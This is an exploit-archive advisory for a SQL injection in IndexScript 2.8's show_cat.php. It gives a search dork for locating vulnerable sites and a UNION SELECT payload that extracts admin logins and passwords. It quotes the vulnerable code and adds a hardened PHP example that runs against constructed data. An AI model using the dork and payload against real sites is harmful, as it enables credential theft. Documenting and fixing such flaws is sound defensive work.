
IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability

Author: xssvgamer
Risk: Security Risk Unsorted
0day-ID: 0day-ID-2049
Category: web applications
Date add: 24-07-2007
Platform: unsorted
====================================================================
IndexScript <= 2.8 (show_cat.php cat_id) SQL Injection Vulnerability
====================================================================



Site: http://indexscript.com
Found By: xssvgamer

Google Dork: allintext: "This site is powered by IndexScript"

exploit:

http://www.example.com/show_cat.php?cat_id=-1 UNION ALL SELECT login,password FROM dir_login /*

Blind SQL injection in IndexScript.

Vulnerable code:
$sql = "select name, meta_title, meta_description, meta_keywords from dir_cat where " .
       "cat_id=" . fnpreparesql($_GET['cat_id']);
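
A hardened form of the lookup above, as an added example that is not IndexScript's code or part of the original advisory: cat_id is validated as an integer and bound as a parameter, so the request shown under "exploit" returns no row. The PDO/SQLite in-memory setup, the open_demo_db and find_category names, and the sample rows are assumptions made for illustration; table and column names are taken from the advisory.

```php
<?php
// Added example: hardened form of the show_cat.php lookup (not IndexScript's own code).
// Table and column names come from the advisory; all rows are constructed sample data.
declare(strict_types=1);

// Hypothetical helper: builds an in-memory database so the example runs offline.
function open_demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE dir_cat (cat_id INTEGER PRIMARY KEY, name TEXT,
                meta_title TEXT, meta_description TEXT, meta_keywords TEXT)');
    $pdo->exec('CREATE TABLE dir_login (login TEXT, password TEXT)');
    $pdo->exec("INSERT INTO dir_cat VALUES (1, 'Books', 'Books', 'Book links', 'books')");
    $pdo->exec("INSERT INTO dir_login VALUES ('admin', 'constructed-hash')");
    return $pdo;
}

// Hypothetical replacement for the concatenated query.
// Returns the category row, or null when cat_id is missing, malformed or unknown.
function find_category(PDO $pdo, $rawCatId): ?array
{
    // 1. Allow-list: cat_id must be a plain positive integer and nothing else.
    $catId = filter_var($rawCatId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($catId === false) {
        return null;
    }
    // 2. Bound parameter: the value is never concatenated into the SQL text.
    $stmt = $pdo->prepare('SELECT name, meta_title, meta_description, meta_keywords
                           FROM dir_cat WHERE cat_id = :cat_id');
    $stmt->bindValue(':cat_id', $catId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$pdo = open_demo_db();
// A valid id, the request string from the advisory, a malformed id, and a missing id.
$inputs = ['1', '-1 UNION ALL SELECT login,password FROM dir_login /*', '1abc', null];
foreach ($inputs as $input) {
    $row = find_category($pdo, $input);
    printf("%-62s => %s\n", var_export($input, true), $row ? $row['name'] : 'rejected / not found');
}
```

The integer check alone closes this injection point because the value sits unquoted in a numeric context; the bound parameter keeps the query safe if the validation is later loosened.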


